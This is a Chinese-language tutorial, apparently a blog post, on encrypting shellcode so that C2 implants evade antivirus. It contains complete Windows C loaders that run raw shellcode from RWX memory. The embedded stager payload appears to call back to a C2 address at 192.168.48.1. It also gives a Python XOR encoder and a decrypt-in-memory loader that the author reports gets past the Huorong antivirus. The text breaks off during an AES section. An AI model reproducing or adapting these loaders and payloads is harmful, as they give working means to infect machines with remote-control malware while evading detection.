【免杀】C2免杀技术（三）shellcode加密

前言

shellcode加密是shellcode混淆的一种手段。shellcode混淆手段有多种：加密（编码）、偏移量混淆、UUID混淆、IPv4混淆、MAC混淆等。

随着杀毒软件的不断进化，其检测方式早已超越传统的静态特征分析。现代杀软往往会在受控的虚拟环境中执行可疑文件，并通过挂钩（hook）方式拦截并跟踪 API 调用，以此判断程序行为是否合法。更先进的产品（例如卡巴斯基）甚至具备内存扫描能力，这使得 shellcode 在内存中一旦被解密后就可能立即暴露，显著增加了免杀的复杂度。

在这种背景下，单纯依靠 shellcode 混淆已难以完全绕过所有检测机制。然而，这并不意味着混淆技术已经失效。相反，在整个免杀流程中，静态免杀始终是第一道门槛。只有先规避静态检测，后续的沙箱对抗、动态行为规避、内存防护等策略才有实施的空间。因此，shellcode 的混淆技术在静态免杀中仍然占据极其重要的地位，是免杀体系中不可或缺的一环。

在掌握了混淆技术后，再进一步结合动态免杀手段，才能更高效地规避当前主流杀软的综合防御体系，从而提升整体的免杀成功率。

shellcode加密类型

Shellcode 加密是指将原始的 shellcode 使用某种加密算法（如 XOR、AES、RC4 等）处理，使其内容看起来不像恶意代码，隐藏真实指令内容，是为了对抗杀软检测，尤其是静态查杀、行为分析、特征提取等机制。 

下面是一些高效实用的加密类型（按免杀实战效果排序）：

加密类型	是否实用	应用场景	特点说明
XOR（变种）	✅⭐⭐⭐⭐⭐	Shellcode、字符串加密	简单快速，易变种，适合动态解密
AES（ECB/CBC）	✅⭐⭐⭐⭐	Beacon配置、Payload保护	安全性高，但需要合理解密方式隐藏行为
RC4/RC4Drop	✅⭐⭐⭐	内存数据、模块通信	加密速度快，行为轻量，适合网络数据隐藏
Base64/Base32	✅⭐	仅限掩盖敏感字段	非加密，只是编码，极易被识别
Custom算法（自定义加密）	✅⭐⭐⭐⭐⭐	内嵌Payload、解密Stub	杀软无签名，抗分析性强
Curve25519 + ChaCha20	✅⭐⭐⭐	高级C2通信（如Sliver）	通信层加密，偏向安全防窃听
Shikata Ga Nai / polymorphic encoder	✅⭐⭐⭐	Shellcode编码	可变性强，但被大量签名收录，需变种

实现过程

1、生成shellcode

2、把shellcode加密

3、构造shellcode加载器：把刚才加密后的shellcode解密并加载执行

4、编译exe

XOR异或加密

1、首先写一个以创建线程的方式加载shellcode的加载器

#include <windows.h>int main() {// Shellcode 以 unsigned char 数组形式存储unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";// 分配可执行内存LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (mem == NULL) {return 1;}// 复制 Shellcode 到分配的内存memcpy(mem, shellcode, sizeof(shellcode));// 创建线程执行 ShellcodeHANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);if (thread == NULL) {VirtualFree(mem, 0, MEM_RELEASE);return 1;}// 等待线程执行完成WaitForSingleObject(thread, INFINITE);// 清理CloseHandle(thread);VirtualFree(mem, 0, MEM_RELEASE);return 0;
}

测试，可以正常上线

编译出来，火绒直接秒

2、进行XOR异或加密，密钥是字符串“kun”

raw_shellcode = b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a"
key = b"kun"
encoded = bytes([b ^ key[i % len(key)] for i, b in enumerate(raw_shellcode)])
print(", ".join(f"0x{b:02x}" for b in encoded))

加密后的shellcode

3、改造刚才的加载器，使其在内存中解密并执行shellcode

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>// 使用字符串 "kun" 作为 XOR key
unsigned char xor_key[] = { 'k', 'u', 'n' };
const size_t key_len = sizeof(xor_key);// XOR混淆的 shellcode（请用你的真实 shellcode 替换）
unsigned char encoded_shellcode[] = { 
0x97, 0x3d, 0xed, 0x8f, 0x85, 0x86, 0xa3, 0x75, 0x6e, 0x6b, 0x34, 0x3f, 0x2a, 0x25, 0x3c, 0x3a, 0x23, 0x26, 0x5a, 0xa7, 0x0b, 0x23, 0xfe, 0x3c, 0x0b, 0x3d, 0xe5, 0x39, 0x6d, 0x26, 0xe0, 0x27, 0x4e, 0x23, 0xfe, 0x1c, 0x3b, 0x3d, 0x61, 0xdc, 0x3f, 0x24, 0x26, 0x44, 0xa7, 0x23, 0x44, 0xae, 0xc7, 0x49, 0x0f, 0x17, 0x77, 0x42, 0x4b, 0x34, 0xaf, 0xa2, 0x78, 0x2f, 0x6a, 0xb4, 0x8c, 0x86, 0x27, 0x2f, 0x3a, 0x3d, 0xe5, 0x39, 0x55, 0xe5, 0x29, 0x49, 0x26, 0x6a, 0xa5, 0x08, 0xea, 0x0d, 0x76, 0x60, 0x77, 0x1b, 0x19, 0xfe, 0xee, 0xe3, 0x75, 0x6e, 0x6b, 0x3d, 0xeb, 0xab, 0x01, 0x09, 0x23, 0x74, 0xbe, 0x3b, 0xfe, 0x26, 0x73, 0x31, 0xe5, 0x2b, 0x55, 0x27, 0x6a, 0xa5, 0x8d, 0x3d, 0x3d, 0x91, 0xa2, 0x34, 0xe5, 0x5f, 0xfd, 0x26, 0x6a, 0xa3, 0x23, 0x5a, 0xbc, 0x26, 0x5a, 0xb5, 0xc2, 0x2a, 0xb4, 0xa7, 0x66, 0x34, 0x6f, 0xaa, 0x4d, 0x8e, 0x1e, 0x84, 0x22, 0x68, 0x39, 0x4a, 0x63, 0x30, 0x57, 0xba, 0x00, 0xb6, 0x33, 0x31, 0xe5, 0x2b, 0x51, 0x27, 0x6a, 0xa5, 0x08, 0x2a, 0xfe, 0x62, 0x23, 0x31, 0xe5, 0x2b, 0x69, 0x27, 0x6a, 0xa5, 0x2f, 0xe0, 0x71, 0xe6, 0x23, 0x74, 0xbe, 0x2a, 0x2d, 0x2f, 0x33, 0x2b, 0x37, 0x31, 0x34, 0x36, 0x2a, 0x2c, 0x2f, 0x31, 0x3d, 0xed, 0x87, 0x55, 0x2f, 0x39, 0x8a, 0x8e, 0x33, 0x34, 0x37, 0x31, 0x3d, 0xe5, 0x79, 0x9c, 0x21, 0x94, 0x8a, 0x91, 0x36, 0x1f, 0x6e, 0x22, 0xcb, 0x19, 0x02, 0x1b, 0x07, 0x05, 0x10, 0x1a, 0x6b, 0x34, 0x38, 0x22, 0xfc, 0x88, 0x27, 0xfc, 0x9f, 0x2a, 0xcf, 0x22, 0x1c, 0x53, 0x69, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0x26, 0x5a, 0xa7, 0x23, 0x5a, 0xb5, 0x23, 0x5a, 0xbc, 0x2f, 0x3b, 0x34, 0x3e, 0x2a, 0xcf, 0x54, 0x3d, 0x0c, 0xc9, 0x94, 0xa0, 0x85, 0x18, 0x2f, 0x26, 0xe2, 0xb4, 0x2f, 0xd3, 0x28, 0x7f, 0x6b, 0x75, 0x23, 0x5a, 0xbc, 0x2f, 0x3a, 0x34, 0x3f, 0x01, 0x76, 0x2f, 0x3a, 0x34, 0xd4, 0x3c, 0xfc, 0xf1, 0xad, 0x8a, 0xbb, 0x80, 0x2c, 0x35, 0x23, 0xfc, 0xaf, 0x23, 0x44, 0xbc, 0x22, 0xfc, 0xb6, 0x26, 0x44, 0xa7, 0x39, 0x1d, 0x6e, 0x69, 0x35, 0xea, 0x39, 0x27, 0x2f, 0xd1, 0x9e, 0x3b, 0x45, 0x4e, 0x91, 0xbe, 0x3d, 0xe7, 0xad, 0x3d, 0xed, 0xa8, 0x25, 0x04, 0x61, 0x2a, 0x26, 0xe2, 0x84, 0x26, 0xe2, 0xaf, 0x27, 0xac, 0xb5, 0x91, 0x94, 0x8a, 0x91, 0x26, 0x44, 0xa7, 0x39, 0x27, 0x2f, 0xd1, 0x58, 0x68, 0x73, 0x0e, 0x91, 0xbe, 0xf0, 0xae, 0x64, 0xf0, 0xf3, 0x6a, 0x75, 0x6e, 0x23, 0x8a, 0xa1, 0x64, 0xf1, 0xe2, 0x6a, 0x75, 0x6e, 0x80, 0xa6, 0x87, 0x8f, 0x74, 0x6e, 0x6b, 0x9d, 0xcc, 0x94, 0x8a, 0x91, 0x44, 0x11, 0x5d, 0x0f, 0x17, 0x6e, 0x9e, 0xe1, 0x94, 0xb9, 0x9b, 0x78, 0x83, 0xcc, 0x97, 0xe4, 0x7a, 0xf1, 0xa8, 0x9c, 0x2f, 0x5e, 0x92, 0x2e, 0xa9, 0x05, 0xac, 0x3b, 0x1a, 0x80, 0xad, 0x7f, 0x9b, 0xdc, 0x1a, 0x02, 0xe9, 0xa4, 0x43, 0x22, 0x61, 0x1c, 0xd2, 0xfe, 0x99, 0xcc, 0xb0, 0x2d, 0x7c, 0x58, 0xf8, 0x57, 0xe2, 0x0f, 0x1c, 0x40, 0xba, 0xc6, 0x72, 0xaf, 0x70, 0xdb, 0x00, 0x10, 0x71, 0xe1, 0x7d, 0x09, 0x2b, 0x1e, 0x34, 0xc1, 0x39, 0x43, 0xe5, 0x5b, 0x11, 0x81, 0x79, 0x75, 0x3b, 0x18, 0x10, 0x1c, 0x46, 0x34, 0x09, 0x0e, 0x1b, 0x1a, 0x51, 0x55, 0x23, 0x04, 0x0f, 0x07, 0x07, 0x19, 0x0f, 0x44, 0x40, 0x40, 0x5b, 0x55, 0x46, 0x08, 0x1a, 0x03, 0x1b, 0x14, 0x1a, 0x02, 0x17, 0x02, 0x0e, 0x4e, 0x4e, 0x26, 0x26, 0x27, 0x2e, 0x55, 0x57, 0x45, 0x45, 0x55, 0x4b, 0x22, 0x07, 0x05, 0x11, 0x01, 0x1c, 0x06, 0x4e, 0x25, 0x21, 0x4e, 0x5d, 0x5b, 0x5f, 0x50, 0x55, 0x3a, 0x19, 0x1c, 0x0a, 0x0e, 0x1b, 0x1a, 0x44, 0x40, 0x40, 0x5b, 0x5c, 0x4e, 0x27, 0x37, 0x2c, 0x39, 0x3a, 0x39, 0x38, 0x30, 0x3c, 0x66, 0x7f, 0x6e, 0xb3, 0x68, 0x27, 0xa6, 0x09, 0x09, 0xbf, 0x40, 0x64, 0xa6, 0x7e, 0x01, 0x28, 0xcd, 0x43, 0x33, 0x14, 0xb8, 0x22, 0xe3, 0x86, 0xe1, 0xbc, 0x6e, 0xbd, 0x0d, 0xd3, 0xa5, 0x0b, 0x86, 0x8d, 0xa6, 0x62, 0x24, 0x96, 0xe4, 0xa7, 0x64, 0x15, 0x25, 0x41, 0x93, 0xe6, 0xd1, 0x9e, 0xb5, 0xf5, 0x4e, 0x21, 0xed, 0x79, 0x51, 0xa7, 0xca, 0xe1, 0x1d, 0xa0, 0x13, 0xd2, 0xd8, 0xbc, 0x33, 0x3c, 0x1b, 0xeb, 0x04, 0x92, 0xbe, 0x0c, 0xd2, 0xd2, 0x84, 0xc4, 0xa4, 0x94, 0x67, 0xc0, 0xe7, 0xf3, 0x48, 0x36, 0x8f, 0x79, 0x11, 0xcb, 0x7b, 0xd7, 0x3d, 0x37, 0x32, 0xe9, 0xfc, 0xb7, 0x6a, 0xe1, 0xac, 0x27, 0xac, 0xe5, 0x30, 0x26, 0xf0, 0x58, 0x37, 0x41, 0x25, 0x54, 0xa0, 0xdf, 0xdd, 0x65, 0x7f, 0xe4, 0xfb, 0x0e, 0xff, 0x25, 0x03, 0x9b, 0x8e, 0xfb, 0x98, 0xab, 0xca, 0xf0, 0x6a, 0xe2, 0x5b, 0xae, 0xcb, 0x61, 0xfa, 0xaa, 0x15, 0xdc, 0x51, 0xd6, 0x58, 0x7c, 0x1b, 0x64, 0x83, 0xd0, 0xa6, 0x89, 0xe9, 0x2c, 0xa6, 0xff, 0x40, 0x9e, 0x83, 0xd5, 0x03, 0x41, 0x1d, 0x9c, 0xee, 0x07, 0x67, 0x80, 0xf9, 0xa3, 0x3f, 0x24, 0x32, 0x31, 0x0d, 0x28, 0x5e, 0xff, 0xa2, 0xd5, 0x4b, 0x2a, 0xd7, 0xb1, 0x4d, 0xed, 0x97, 0x38, 0xcb, 0x72, 0xa3, 0x18, 0x86, 0x4f, 0x41, 0xb6, 0xf1, 0x07, 0x4f, 0x9a, 0x22, 0x8c, 0xea, 0xe8, 0x5b, 0x09, 0x7e, 0xff, 0x54, 0x48, 0xcb, 0x55, 0xf6, 0xd9, 0x0b, 0xef, 0x4e, 0xb2, 0xc2, 0xca, 0x02, 0xe3, 0x6e, 0x2a, 0xcb, 0x9e, 0xde, 0xd7, 0x38, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0xd4, 0x6b, 0x75, 0x2e, 0x6b, 0x34, 0xd6, 0x6b, 0x65, 0x6e, 0x6b, 0x34, 0xd7, 0x2b, 0x75, 0x6e, 0x6b, 0x34, 0xd4, 0x33, 0xd1, 0x3d, 0x8e, 0x8a, 0xbb, 0x23, 0xe6, 0x3d, 0x38, 0x3d, 0xe7, 0x8c, 0x3d, 0xe7, 0x9a, 0x3d, 0xe7, 0xb1, 0x34, 0xd6, 0x6b, 0x55, 0x6e, 0x6b, 0x3c, 0xe7, 0x92, 0x34, 0xd4, 0x79, 0xe3, 0xe7, 0x89, 0x8a, 0xbb, 0x23, 0xf6, 0xaa, 0x4b, 0xf0, 0xae, 0x1f, 0xc3, 0x08, 0xe0, 0x72, 0x26, 0x6a, 0xb6, 0xeb, 0xab, 0x00, 0xb9, 0x33, 0x2d, 0x36, 0x23, 0x70, 0x6e, 0x6b, 0x75, 0x6e, 0x3b, 0xb6, 0x86, 0xf4, 0x88, 0x91, 0x94, 0x44, 0x57, 0x59, 0x5b, 0x5f, 0x5d, 0x4d, 0x40, 0x5f, 0x4d, 0x40, 0x5a, 0x75, 0x6e, 0x61, 0x59, 0x44
};
size_t shellcode_len = sizeof(encoded_shellcode);int main() {// 申请 RWX 内存LPVOID exec_mem = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!exec_mem) {printf("VirtualAlloc failed.\n");return -1;}// 复制加密的 shellcode 到可执行内存memcpy(exec_mem, encoded_shellcode, shellcode_len);// 在已加载的内存中解密 shellcodefor (size_t i = 0; i < shellcode_len; ++i) {((unsigned char*)exec_mem)[i] ^= xor_key[i % key_len];}// 创建线程执行 shellcodeHANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);if (!hThread) {printf("CreateThread failed.\n");VirtualFree(exec_mem, 0, MEM_RELEASE);return -1;}// 等待 shellcode 执行完成WaitForSingleObject(hThread, INFINITE);// 清理VirtualFree(exec_mem, 0, MEM_RELEASE);return 0;
}

注意！在改造加载器时，必须确保硬编码在其中的 shellcode 是以加密形式存储的。否则极易被杀软扫描到明文特征。在正确的加载流程中，shellcode 的解密操作应在其写入内存（通常使用 memcpy 或等效方式）之后进行；若在写入前提前解密，等同于将明文代码暴露在磁盘或可见内存中，这无异于“裸奔”。

运行测试，能上线，说明代码没问题

打包编译出来，火绒不再查杀，可以正常上线！

AES加密

1、同样，先写一个加载器，这里使用回调函数执行shellcode

#include <windows.h>
#include <iostream>int main()
{unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\